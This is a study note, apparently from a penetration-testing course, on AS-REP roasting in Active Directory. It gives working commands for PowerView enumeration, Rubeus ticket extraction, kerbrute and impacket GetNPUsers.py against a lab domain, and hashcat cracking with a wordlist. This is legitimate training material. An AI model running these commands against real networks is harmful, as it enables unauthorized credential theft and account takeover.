20 - ASREProasting

# ASREProasting Introduction - Obtain a TGT for any account that has the [Do not require Kerberos pre-authentication](https://www.tenable.com/blog/how-to-stop-the-kerberos-pre-authentication-attack-in-active-directory) setting enabled - Many vendor installation guides specify that their service account be configured in this way - The authentication service reply (AS_REP) is encrypted with the account’s password, and any domain user can request it - This can be subjected to an offline password attack using a tool such as `hashcat` or `john` - ASREPRoasting is similar to Kerberoasting, but it involves attacking the AS-REP instead of the TGS-REP - An SPN is not required - This setting can be enumerated with `PowerView` or built-in tools such as the PowerShell AD module - The attack itself can be performed with the [Rubeus](https://github.com/GhostPack/Rubeus) toolkit and other tools to obtain the ticket for the target account - Furthermore, iIf an attacker has `GenericWrite` or `GenericAll` permissions over an account, they can enable this attribute and obtain the AS-REP ticket for offline cracking to recover the account's password before disabling the attribute again ## Enumerate ASREP from Windows - Enumerate for DONT_REQ_PREAUTH Value using `Get-DomainUser` ```powershell PS C:\htb> Import-Module .\PowerView.ps1 PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl samaccountname : mmorgan userprincipalname : [email protected] useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH ``` ![[images/Pasted image 20251106143545.png]] - Retrieve TGT using `rubeus` - Use `/nowrap` flag so TGT is not column wrapped and is retrieved in a format that we can readily feed into `hashcat` ```powershell .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat ``` ![[images/Pasted image 20251106143736.png]] - Crack the TGT offline using `hashcat` ```bash hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt ``` ![[images/Pasted image 20251106143746.png]] ## Enumerate ASREP from Linux - Use the `jsmith.txt` user list and `kerbrute userenum` to retrieve valid users in domain and also automatically retrieve any `krb5asrep` TGTs - Crack TGT offline using `hashcat` ```bash kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt ``` ![[images/Pasted image 20251106144122.png]] - Alternatively, use `GetNPUsers.py` from `impacket` to hunt for all users with Kerberos pre-authentication not required - Crack TGT offline using `hashcat` ```bash GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users ``` ![[images/Pasted image 20251106144432.png]]